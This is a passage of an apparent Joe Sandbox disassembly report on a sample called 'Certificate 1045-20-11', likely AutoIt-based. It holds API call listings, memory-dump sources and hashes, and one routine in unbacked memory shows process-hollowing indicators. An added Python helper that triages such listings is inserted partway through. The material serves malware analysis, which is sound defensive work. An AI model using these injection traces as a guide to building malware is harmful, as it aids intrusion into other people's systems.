• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                • API String ID: 1586453840-614718249
                                                                                • Opcode ID: 7572ab3ae75da68efc92a77f45f4832693b853f79f0e7523aef4f52709bed848
                                                                                • Instruction ID: 20b39adf057b4af8d51da6b0b47c7fd01ed924e4e8d26abe27cce3d36d1d819e
                                                                                • Opcode Fuzzy Hash: 7572ab3ae75da68efc92a77f45f4832693b853f79f0e7523aef4f52709bed848
                                                                                • Instruction Fuzzy Hash: B9113D71A0020DBEEB04EBA8CD86EFF7BBCFF04344F101069B506D6291EA709E469B50
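The two entries above are the kinds a reviewer picks out of these listings: the routine at 00EB0168 sits in memory that is not backed by the PE on disk (Source File ... based on PE: false) and opens a file from there, and the routine at 008449FB opens HKCU\Software\AutoIt v3\AutoIt. The script below is an added example, not part of this report and not Joe Sandbox's own code: it parses the text form of the APIs, Memory Dump Source and Similarity blocks, decodes the memory-region flags from the dump file name and lists the registry keys opened. The decoding of the .sdmp name (fifth dot-separated field read as PAGE_* protection, seventh as MEM_* type) is an assumption inferred from the two names on this page, not documented here; the sample input is a constructed excerpt of those two entries.

```python
"""Triage helper for Joe Sandbox per-function API listings.

Added example; not part of this report and not Joe Sandbox code.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed input: trimmed copies of two function entries from this report
# (the CreateFileW routine at 00EB0168 and the registry routine at 008449FB).
REPORT_EXCERPT = r"""APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EB0239
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EB045F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
Similarity
• API ID: CreateFileFreeVirtual
• String ID: S
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00844A1D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008B41DB
• RegCloseKey.ADVAPI32(?), ref: 008B4249
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
"""

# Win32 constants used to decode the region flags.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}

# One API line: optional "Part of subcall function X:" prefix, Name.Module(args), ref: addr
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SRC_RE = re.compile(
    r"^• Source File: (?P<dump>\S+\.sdmp), Offset: [0-9A-Fa-f]+, based on PE: (?P<pe>true|false)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    via_subcall: bool


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    dump: str = ""
    pe_backed: Optional[bool] = None
    strings: List[str] = field(default_factory=list)

    @property
    def ref(self) -> str:
        # Address of the first direct call, used as the entry's label.
        direct = [c.ref for c in self.calls if not c.via_subcall]
        return direct[0] if direct else "?"


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the listing at each 'APIs' header and collect calls, dump and strings."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] is not None))
            continue
        m = SRC_RE.match(line)
        if m:
            cur.dump, cur.pe_backed = m["dump"], m["pe"] == "true"
        elif line.startswith("• String ID:"):
            cur.strings = [s for s in line.split(":", 1)[1].strip().split("$") if s]
    return entries


def describe_region(dump: str) -> Tuple[str, str]:
    """Decode (protection, type) from a .sdmp name.

    Assumption, not documented on this page: field 5 is the PAGE_* protection
    and field 7 the MEM_* type. The two names here decode to
    EXECUTE_READ/MEM_IMAGE for the mapped executable and
    EXECUTE_READWRITE/MEM_PRIVATE for the unbacked region, which fits.
    """
    f = dump.split(".")
    protect, mtype = int(f[4], 16), int(f[6], 16)
    return PAGE_PROTECT.get(protect, hex(protect)), MEM_TYPE.get(mtype, hex(mtype))


def triage(entries: List[FunctionEntry]) -> List[str]:
    """Flag code outside the mapped image and list registry keys it opens."""
    findings: List[str] = []
    for e in entries:
        if e.pe_backed is False:
            protect, mtype = describe_region(e.dump)
            findings.append(f"{e.ref}: code in {mtype} memory ({protect}), not backed by the PE on disk")
            if any(c.name == "CreateFileW" for c in e.calls):
                findings.append(f"{e.ref}: that unbacked code opens a file (CreateFileW)")
        for c in e.calls:
            if c.name == "RegOpenKeyExW" and not c.via_subcall and len(c.args) >= 2:
                try:
                    hive = HIVES.get(int(c.args[0], 16), c.args[0])
                except ValueError:
                    hive = c.args[0]
                findings.append(f"{c.ref}: opens registry key {hive}\\{c.args[1]}")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_entries(REPORT_EXCERPT)):
        print(finding)
```

Run it as a script to print the findings, or pass the copied text of a whole disassembly section to parse_entries. Executable private memory with no image backing is the region type one expects for unpacked or injected code, which is why the decoded flags carry more information than the bare "based on PE: false".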

Control-flow Graph
• Control-flow graph (rendered as an image in the original; executed/not-executed colouring not recoverable) for the function at 008436B8: a single basic block 008436B8-00843728 calling CreateWindowExW twice and ShowWindow twice.
                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008436E6
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00843707
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00843AA3,?), ref: 0084371B
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00843AA3,?), ref: 00843724
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: be5c577193b85597c2390900008f06b1122c8a3305f74374ab0faa6307a65dc7
                                                                                • Instruction ID: 18d2a1b99a590c032e66f54e5ebf1a61e71d1ebfe6582d7214acdcd07abcc590
                                                                                • Opcode Fuzzy Hash: be5c577193b85597c2390900008f06b1122c8a3305f74374ab0faa6307a65dc7
                                                                                • Instruction Fuzzy Hash: CEF03A705542D0BEE7306757AC48E672EBEE7C6F20B01802FFA04A22A0C5711895EAB0

Control-flow Graph
• Control-flow graph (rendered as an image in the original; executed/not-executed colouring not recoverable) for the function at 00EAFF08: basic blocks 00EAFF08-00EB011C; calls 00EADB58, 00EAFDF8, CreateFileW, VirtualAlloc, ReadFile, 00EAFE38, 00EAEDF8, 00EAFE88, ExitProcess.
                                                                                APIs
                                                                                  • Part of subcall function 00EAFDF8: Sleep.KERNELBASE(000001F4), ref: 00EAFE09
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EB0056
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileSleep
                                                                                • String ID: WC1ZWF270H95AP8B
                                                                                • API String ID: 2694422964-790463931
                                                                                • Opcode ID: af67d319f7180167a9413278e681dc6fe5db51006b3dd26f50d334adfec864eb
                                                                                • Instruction ID: 78d93647f8a2155a78b58b57051647f3d6d61c53114553399f4617fc03653974
                                                                                • Opcode Fuzzy Hash: af67d319f7180167a9413278e681dc6fe5db51006b3dd26f50d334adfec864eb
                                                                                • Instruction Fuzzy Hash: 32519030E14248DBEB11DBE4C854BEFBBB9AF19304F009599E248BB2C1D7B91B45CB65
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0084522F
                                                                                • _wcscpy.LIBCMT ref: 00845283
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00845293
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008B3CB0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                • String ID: Line:
                                                                                • API String ID: 1053898822-1585850449
                                                                                • Opcode ID: fd6ec764cd87273464a704514b6fe4610a1e2821679b4904a8e338ecac1185a1
                                                                                • Instruction ID: 33dafb27a2e7284bb12dece8527dae586fcd4e3270eb092365c7f5d458a28ccd
                                                                                • Opcode Fuzzy Hash: fd6ec764cd87273464a704514b6fe4610a1e2821679b4904a8e338ecac1185a1
                                                                                • Instruction Fuzzy Hash: D3319C71408748AFD321EB64DC42FDE77E8FB44314F00461AF599D2192EBB4A658CB97
                                                                                APIs
                                                                                  • Part of subcall function 008441A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008439FE,?,00000001), ref: 008441DB
                                                                                • _free.LIBCMT ref: 008B36B7
                                                                                • _free.LIBCMT ref: 008B36FE
                                                                                  • Part of subcall function 0084C833: __wsplitpath.LIBCMT ref: 0084C93E
                                                                                  • Part of subcall function 0084C833: _wcscpy.LIBCMT ref: 0084C953
                                                                                  • Part of subcall function 0084C833: _wcscat.LIBCMT ref: 0084C968
                                                                                  • Part of subcall function 0084C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0084C978
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                • API String ID: 805182592-1757145024
                                                                                • Opcode ID: e99b61add636431a572c076096f6549a8cab5a722728220e14469c30f51b9b72
                                                                                • Instruction ID: d61c9de2db7cf85736a99feda35cb6210b01893ccefdf1e46b953e9fa42857fb
                                                                                • Opcode Fuzzy Hash: e99b61add636431a572c076096f6549a8cab5a722728220e14469c30f51b9b72
                                                                                • Instruction Fuzzy Hash: A5912A7191021DAFCF14EFA8CC919EEBBB4FF19310F14442AE816EB291DB74AA45CB51
                                                                                APIs
                                                                                  • Part of subcall function 00845374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00901148,?,008461FF,?,00000000,00000001,00000000), ref: 00845392
                                                                                  • Part of subcall function 008449FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00844A1D
                                                                                • _wcscat.LIBCMT ref: 008B2D80
                                                                                • _wcscat.LIBCMT ref: 008B2DB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$FileModuleNameOpen
                                                                                • String ID: \$\Include\
                                                                                • API String ID: 3592542968-2640467822
                                                                                • Opcode ID: befc1a3c93d1882da5ce45781a59b6204c0c23ad6d919b93133e164646a450ee
                                                                                • Instruction ID: 0fbc50308fe61f6bafe10a816ed5c489bcb952de95cf64851f6f8b88e2815725
                                                                                • Opcode Fuzzy Hash: befc1a3c93d1882da5ce45781a59b6204c0c23ad6d919b93133e164646a450ee
                                                                                • Instruction Fuzzy Hash: 8E518F7142C3488FC754EF69E9859AAB7F8FF59300B40452EF644C3261EB709A08DB53
                                                                                APIs
                                                                                • __getstream.LIBCMT ref: 008634FE
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00863539
                                                                                • __wopenfile.LIBCMT ref: 00863549
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
• String ID: <G
• API String ID: 1820251861-2138716496
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0085D28B,SwapMouseButtons,00000004,?), ref: 0085D2BC
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0085D28B,SwapMouseButtons,00000004,?,?,?,?,0085C865), ref: 0085D2DD
• RegCloseKey.KERNELBASE(00000000,?,?,0085D28B,SwapMouseButtons,00000004,?,?,?,?,0085C865), ref: 0085D2FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00EAF5B3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EAF649
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EAF66B
Memory Dump Source
• Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
  • Part of subcall function 008422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008424F1), ref: 00842303
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008425A1
• CoInitialize.OLE32(00000000), ref: 00842618
• CloseHandle.KERNEL32(00000000), ref: 008B503A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: Handle$CloseInitializeMessageRegisterWindow
• String ID: xH
• API String ID: 3815369404-622052890
APIs
  • Part of subcall function 00844517: _fseek.LIBCMT ref: 0084452F
  • Part of subcall function 0088C56D: _wcscmp.LIBCMT ref: 0088C65D
  • Part of subcall function 0088C56D: _wcscmp.LIBCMT ref: 0088C670
• _free.LIBCMT ref: 0088C4DD
• _free.LIBCMT ref: 0088C4E4
• _free.LIBCMT ref: 0088C54F
  • Part of subcall function 00861C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00867A85), ref: 00861CB1
  • Part of subcall function 00861C9D: GetLastError.KERNEL32(00000000,?,00867A85), ref: 00861CC3
• _free.LIBCMT ref: 0088C557
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
APIs
• _memset.LIBCMT ref: 0085EBB2
  • Part of subcall function 008451AF: _memset.LIBCMT ref: 0084522F
  • Part of subcall function 008451AF: _wcscpy.LIBCMT ref: 00845283
  • Part of subcall function 008451AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00845293
• KillTimer.USER32(?,00000001,?,?), ref: 0085EC07
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0085EC16
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008B3C88
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
APIs
• _memset.LIBCMT ref: 008B3725
• GetOpenFileNameW.COMDLG32 ref: 008B376F
  • Part of subcall function 0084660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008453B1,?,?,008461FF,?,00000000,00000001,00000000), ref: 0084662F
  • Part of subcall function 008440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008440C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 0088C72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0088C746
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
APIs
• _memset.LIBCMT ref: 00845022
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 008450CB
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0
APIs
• __FF_MSGBANNER.LIBCMT ref: 00863973
  • Part of subcall function 008681C2: __NMSG_WRITE.LIBCMT ref: 008681E9
  • Part of subcall function 008681C2: __NMSG_WRITE.LIBCMT ref: 008681F3
• __NMSG_WRITE.LIBCMT ref: 0086397A
  • Part of subcall function 0086821F: GetModuleFileNameW.KERNEL32(00000000,00900312,00000104,00000000,00000001,00000000), ref: 008682B1
  • Part of subcall function 0086821F: ___crtMessageBoxW.LIBCMT ref: 0086835F
  • Part of subcall function 00861145: ___crtCorExitProcess.LIBCMT ref: 0086114B
  • Part of subcall function 00861145: ExitProcess.KERNEL32 ref: 00861154
  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
• RtlAllocateHeap.NTDLL(00C60000,00000000,00000001,00000001,00000000,?,?,0085F507,?,0000000E), ref: 0086399F
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 1372826849-0
                                                                                • Opcode ID: 89fec7069764d45ace3846e1ce3d7e07fbdae052d6311f0cae41ce0b356a06fe
                                                                                • Instruction ID: b9ccd78016450b5ac13e89763739bc7e1dbb5e56f833995f5bc2da94ad47d0f9
                                                                                • Opcode Fuzzy Hash: 89fec7069764d45ace3846e1ce3d7e07fbdae052d6311f0cae41ce0b356a06fe
                                                                                • Instruction Fuzzy Hash: 6201B5313497119AEA213B29EC56B2A3758FF83764F27012AF505DB2D2DFB09D009AA5
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0088C385,?,?,?,?,?,00000004), ref: 0088C6F2
                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0088C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0088C708
                                                                                • CloseHandle.KERNEL32(00000000,?,0088C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0088C70F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: 13c6bfc6562490912f7fa768d1a61e5fa0e8132957ab13b7abe051b1e710c507
                                                                                • Instruction ID: dcaa24b9a1d715b4d201400fd1a010dd7e5d10bf7b0ec71649737f7ba5f264ce
                                                                                • Opcode Fuzzy Hash: 13c6bfc6562490912f7fa768d1a61e5fa0e8132957ab13b7abe051b1e710c507
                                                                                • Instruction Fuzzy Hash: 24E08632140314B7D7213B54AC0DFCABB28FB45760F144121FB14690E097B125118798
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0088BB72
                                                                                  • Part of subcall function 00861C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00867A85), ref: 00861CB1
                                                                                  • Part of subcall function 00861C9D: GetLastError.KERNEL32(00000000,?,00867A85), ref: 00861CC3
                                                                                • _free.LIBCMT ref: 0088BB83
                                                                                • _free.LIBCMT ref: 0088BB95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                • Instruction ID: 1a96c80dfb6ae4827dd4c9ca0c0209b6f1519d3d18afe30b805e50cb29acb174
                                                                                • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                • Instruction Fuzzy Hash: 4DE012A164174187DE34757D6E48EB713CCEF443617190C1DB459E7147DF24E84086A8
                                                                                APIs
                                                                                • _strcat.LIBCMT ref: 008A08FD
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • _wcscpy.LIBCMT ref: 008A098C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf_strcat_wcscpy
                                                                                • String ID:
                                                                                • API String ID: 1012013722-0
                                                                                • Opcode ID: f4677e7adb6ae48fe212dbf0a89f76291c6cf1233f8158a5976575b7902ef679
                                                                                • Instruction ID: 4705ef2ae783682bd3034d52305367f1522b29745537c243c239a83df7a97ff4
                                                                                • Opcode Fuzzy Hash: f4677e7adb6ae48fe212dbf0a89f76291c6cf1233f8158a5976575b7902ef679
